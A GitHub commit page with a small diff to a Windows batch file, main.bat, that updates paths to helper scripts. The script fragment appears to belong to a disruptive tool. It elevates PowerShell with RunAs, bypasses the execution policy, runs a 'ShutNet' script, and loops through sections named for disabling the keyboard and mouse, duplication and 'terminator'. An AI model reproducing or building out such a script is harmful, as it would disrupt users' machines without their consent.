Skip to content

Commit

Permalink
v0.0.0.28 dir fixed
Browse files Browse the repository at this point in the history
  • Loading branch information
INeddHelp committed Mar 25, 2023
1 parent e64ff0f commit de5a6c4
Showing 1 changed file with 3 additions and 3 deletions.
6 changes: 3 additions & 3 deletions .scripts/main.bat → main.bat
Original file line number Diff line number Diff line change
Expand Up @@ -34,13 +34,13 @@ for /f "tokens=2 delims=," %%b in ('wmic path Win32_Keyboard get Description^,De


:duplication
PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', 'make_file.ps1' -Verb RunAs"
PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', '.scripts\make_file.ps1' -Verb RunAs"


goto disablekeyboardandmouse
PowerShell.exe -ExecutionPolicy Bypass
PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', 'ShutNet.ps1' -Verb RunAs"
PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', '.scripts\ShutNet.ps1' -Verb RunAs"
goto duplication
cscript main.vbs
cscript .scripts\main.vbs
goto netsecurety
goto terminator

0 comments on commit de5a6c4

Please sign in to comment.